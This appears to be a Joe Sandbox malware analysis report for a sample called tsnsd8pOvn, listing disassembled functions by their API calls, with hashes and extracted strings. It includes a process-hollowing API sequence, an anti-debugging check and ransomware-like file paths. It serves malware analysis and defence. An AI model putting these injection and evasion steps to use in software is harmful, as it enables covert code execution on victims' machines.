                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                • String ID:
                                • API String ID: 2974526305-0
                                • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                APIs
                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                • String ID:
                                • API String ID: 3058430110-0
                                • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                APIs
                                • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleWritelstrlen
                                • String ID:
                                • API String ID: 1421093161-0
                                • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                APIs
                                • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                  • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                  • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                • CallCatchBlock.LIBCMT ref: 004C70F8
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                • String ID:
                                • API String ID: 2901542994-0
                                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                                APIs
                                  • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                  • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                • __calloc_crt.LIBCMT ref: 00425A01
                                  • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                • __lock.LIBCMT ref: 00425A37
                                • ___addlocaleref.LIBCMT ref: 00425A43
                                • __lock.LIBCMT ref: 00425A57
                                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                • String ID:
                                • API String ID: 2580527540-0
                                • Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                • Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                APIs
                                • lstrlenW.KERNEL32 ref: 004127B9
                                • _malloc.LIBCMT ref: 004127C3
                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                • _memset.LIBCMT ref: 004127CE
                                • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                • String ID:
                                • API String ID: 2824100046-0
                                • Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                • Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                APIs
                                • lstrlenA.KERNEL32 ref: 00412806
                                • _malloc.LIBCMT ref: 00412814
                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                • _memset.LIBCMT ref: 0041281F
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                • String ID:
                                • API String ID: 2824100046-0
                                • Opcode ID: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                                • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                • Opcode Fuzzy Hash: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                                • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: .\crypto\asn1\tasn_new.c
                                • API String ID: 2102423945-2878120539
                                • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                                • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                APIs
                                • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                  • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                                  • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                                  • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                                  • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                                  • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                  • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                                  • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                • TranslateMessage.USER32(?), ref: 0041B4CD
                                • DispatchMessageW.USER32(?), ref: 0041B4D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                • String ID: %username%$I:\5d2860c89d774.jpg
                                • API String ID: 441990211-897913220
                                • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .\crypto\err\err.c$unknown
                                • API String ID: 0-565200744
                                • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                APIs
                                • _memset.LIBCMT ref: 0042419D
                                • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: DebuggerPresent_memset
                                • String ID: i;B
                                • API String ID: 2328436684-472376889
                                • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                • String ID: 8Q
                                APIs
                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                  • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                • _memset.LIBCMT ref: 00413C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                • String ID: vector<T> too long
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _fputws$CreateDirectory
                                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                APIs
                                Strings
                                • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __calloc_crt
                                • String ID: Assertion failed: %s, file %s, line %d
                                APIs
                                • _memset.LIBCMT ref: 00480686
                                  • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                Strings
                                • .\crypto\evp\digest.c, xrefs: 00480638
                                • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset_raise
                                • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                APIs
                                • std::exception::exception.LIBCMT ref: 0044F251
                                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                • __CxxThrowException@8.LIBCMT ref: 0044F266
                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                • String ID: TeM

                                Execution Graph

                                Execution Coverage:1.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:38
                                Total number of Limit Nodes:8

                                Control-flow Graph

                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02200156
                                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0220016C
                                • CreateProcessA.KERNELBASE(?,00000000), ref: 02200255
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02200270
                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02200283
                                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0220029F
                                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022002C8
                                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 022002E3
                                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02200304
                                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0220032A
                                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02200399
                                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022003BF
                                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 022003E1
                                • ResumeThread.KERNELBASE(00000000), ref: 022003ED
                                • ExitProcess.KERNEL32(00000000), ref: 02200412
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                • String ID:

                                Control-flow Graph

                                APIs
                                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02200533
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateWindow
                                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin

                                Control-flow Graph

                                APIs
                                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 022005EC
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AttributesFile
                                • String ID: apfHQ$o

                                Control-flow Graph

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 021647EE
                                • Module32First.KERNEL32(00000000,00000224), ref: 0216480E
                                Memory Dump Source
                                • Source File: 00000005.00000002.2213957997.0000000002164000.00000040.00000020.00020000.00000000.sdmp, Offset: 02164000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2164000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                • String ID:

                                Control-flow Graph

                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 021644D6
                                Memory Dump Source
                                • Source File: 00000005.00000002.2213957997.0000000002164000.00000040.00000020.00020000.00000000.sdmp, Offset: 02164000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2164000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                • String ID:

                                Control-flow Graph

                                APIs
                                • std::exception::exception.LIBCMT ref: 0224FC1F
                                  • Part of subcall function 0223169C: std::exception::_Copy_str.LIBCMT ref: 022316B5
                                • __CxxThrowException@8.LIBCMT ref: 0224FC34
                                • std::exception::exception.LIBCMT ref: 0224FC4D
                                • __CxxThrowException@8.LIBCMT ref: 0224FC62
                                • std::regex_error::regex_error.LIBCPMT ref: 0224FC74
                                  • Part of subcall function 0224F914: std::exception::exception.LIBCMT ref: 0224F92E
                                • __CxxThrowException@8.LIBCMT ref: 0224FC82
                                • std::exception::exception.LIBCMT ref: 0224FC9B
                                • __CxxThrowException@8.LIBCMT ref: 0224FCB0
                                Strings
                                • ruhud. Ticodiputabu rid. Hicawaguroxoli dolebeve sodubu. Vubawevilapahi kiwowac ritopaxulizaz. Bohaxudoloc rabapune. Pipujiha dacihiz wawoyivojijuki. Winorujoja pegep. Xuj fimifagomibex bilawukofiral jilohogicurujam xoxitolelupagel. Vigu getosixiti jumebivom. , xrefs: 0224FCB6
                                • leM, xrefs: 0224FCA8
                                Memory Dump Source
                                • Source File: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2200000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
